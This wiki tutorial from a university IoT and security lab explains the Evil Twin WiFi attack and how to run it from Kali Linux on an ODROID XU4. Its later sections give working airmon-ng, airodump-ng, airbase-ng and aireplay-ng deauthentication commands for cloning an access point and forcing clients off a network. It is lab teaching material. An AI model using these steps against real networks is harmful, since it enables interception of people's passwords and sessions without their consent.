Evil Twin Attack via Kali on Odroid XU4

From Embedded Lab Vienna for IoT & Security
Revision as of 18:38, 1 January 2023 by JHangstein (talk | contribs) (Updated summary to give a more in-depth overview over the attack and its implications. Added a paragraph detailing MitM.)
Jump to navigation Jump to search

Summary

The Evil Twin (ET) Attack is a type of Machine-in-the-Middle (MitM) attack that is carried out via WiFi. The basic premise of the attack is to fool victims into thinking they are connecting to a legitimate access point (AP), when in fact they are connecting to the "evil twin" AP.

The goal of the attack usually coincides with the typical goals of any MitM attack. As every traffic leaving the local network to be routed over the internet leaves the LAN over the default gateway, an attacker can intercept all outgoing traffic when a client is connected to the ET. Attackers then redirect the traffic received by the victim to the legitimate gateway, posing as the victim machine. Network traffic now flows like normal, but via the attacker. Endpoints can still communicate with each other like before, but the victim's data is now at the attacker’s mercy. This data can be passwords or entire sessions to access e-mail accounts or social networks. When considering the attack by comparing it against the CIA Triad, the implications are massive. An attacker in this position can compromise confidentiality by eavesdropping, and integrity by message modification. They can also intercept, modify, or destroy the messages to compromise availability.

The attack is conducted as follows: First, the attacker has to figure out which access point the intended victim is using. In the case no specific victim is targeted, attackers could also choose a commonly used access point like a public WiFi hotspot. If the access point that is going to be impersonated is fixated, in a second step the attacker has to take note of the APs Service Set Identification (SSID) number, and the Basic Service Set Identification (BSSID) number. The SSID is the name that is displayed for users trying to connect to a WiFi AP, while the BSSID is the physical MAC address of said AP. This is no complicated feat, as access points send out these two numbers constantly to allow users to connect. Following this premise, if the attacker sends out this information themselves, the evil twin will show up on the victim's device in the list of access points to connect to, with the same SSID and BSSID as the legitimate access point. With appropriate tools that will be described in more detail below, clients can be disconnected from the legitimate AP. The goal is to then broadcast with a stronger signal than the legitimate access point, fooling users to connect to the "best" available access point.

If the original access point is password protected, according measures need to be taken. Password protected access points are not immune to Evil Twin Attacks, especially when dealing with access points with easily obtainable passwords. This includes cafés, hotels, and similar institutions that tend to share their provided access point's password with their customer base. But even a private WiFi hotspot's password can be obtained through social engineering attacks without much sophistication. For example, attackers innocently asking for a WiFi password can fool a person knowing the password into giving it up. Another possibility is capturing a WPA handshake between the legitimate AP and a client and cracking the transmitted hash. In any case, as soon as the password is obtained, it can be added to the evil twin configuration.


Requirements/Hardware

Operating system: [Kali Linux ODROID-XU3[1]]

Hardware:

  • WiFi
  • Client connected to WiFi
  • ODROID XU4 single-board computer (incl. power supply unit 5V/4A)
  • eMMC (min. 8GB)
  • microSD (min. 8GB)
  • microSD to USB adapter
  • Mouse
  • Keyboard
  • Monitor (via HDMI)
  • WiFi adapter (e.g. Alfa AWUS036EAC)

Installing Kali on ODROID XU4

Step 1: Download

Download the Kali image. The ODROID XU4 is very similar to the ODROID XU3 thus the OS of XU3 can be used for XU4 too.

Step 2: Preparation

  • Insert the microSD card into you PC (if required use the adapter)
  • Format the microSD card with e.g. ["SD Fortmatter" [2]]. If you use "SD Formatter": don't forget to check "Format Size Adjustment" in "Options".
  • Add the OS to the microSD card. Required: a program to create bootable devices, e.g. [Win32 Disk Imager for Windows [3]].

Step 3: Installing

For the following steps you might need the [manual of ODROID XU4 [4]] to see where the mentioned parts are located.

  • Stick the eMMC to the ODROID XU4
  • Switch the Boot Mode Selector to "microSD"
  • Put in the microSD card
  • Attach mouse, keyboard and monitor to the XU4. Make sure that all of them are attached before booting - otherwise you will receive a kernel error.
  • After that: attach the power supply.


If all steps were performed correctly:

  • The fan of the ODROID XU4 starts
  • The blue LED should be on (solid light): bootloader running.
  • Monitor should display booting.

This can take a while. 

Username: kali
Password: kali


States of the ODROID XU4 LED:

  • red LED: is on when power is available
  • blue LED (solid): when the bootloader is running
  • blue LED (blinks slowly, like a heartbeat): kernel is running
  • blue LED (blinks fast): kernel is in panic mode

Performing Evil Twin on ODROID XU4

First, add the WiFi adapter to the XU4, reboot and check if it is recognized: 

sudo reboot
sudo ifconfg


See the available interfaces 

sudo iwconfig


Check status of wireless interfaces 

sudo airmon-ng


Start monitor mode on the available wireless interface. 

sudo airmon-ng start <interface> <channel>

Cue: Output has to contain "monitor mode enabled"


Eventually kill processes and execute command again 

sudo airmon-ng check kill
sudo airmon-ng start <interface> <channel>


Capture packets 

sudo airodump-ng <interface> -c <channel>

After 30-40 seconds, press ctrl+c and leave the terminal as it is and open a new one.


Creating the twin 

sudo airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>

The data is taken from the previous output and these are required to trick the victim. After running the command, airebase turned the wireless adapter into an access point. Open a new terminal.


In the next step the client and the XU4 will lose the connection to the internet. Because the WiFi Adapter of XU4 is busy acting like an access point, it either needs a second WiFi adapter or an ethernet connection to the internet.

Telling the Client to get lost

Disconnect all Clients: 

sudo aireplay-ng --deauth 0 -a <BSSID> <interface>--ignore-negative-one

The "0" indicates how fast the deauthentication packets will be sent (in seconds). 0 is the fastest option. But this command sometimes doesn't work because it could produce a broadcast storm, so some WiFi routers filter them.

Disconnect a specific client: First run the airodump-ng command again, but with BSSID of router to receive the MAC address of the client: 

sudo airodump-ng wlan0 --bssid <routers BSSID> -c <routers channel>

Then execute the deauth-command: 

sudo aireplay-ng --deauth 0 -c <devices MAC address> -a <routers MAC address> interface>


Error handling

If neither disconnecting all clients nor disconnecting a specific client worked, you can check if the card supports injection: 

sudo aireplay-ng --test wlan0

References

Retrieved from "https://wiki.elvis.science/index.php?title=Evil_Twin_Attack_via_Kali_on_Odroid_XU4&oldid=10480"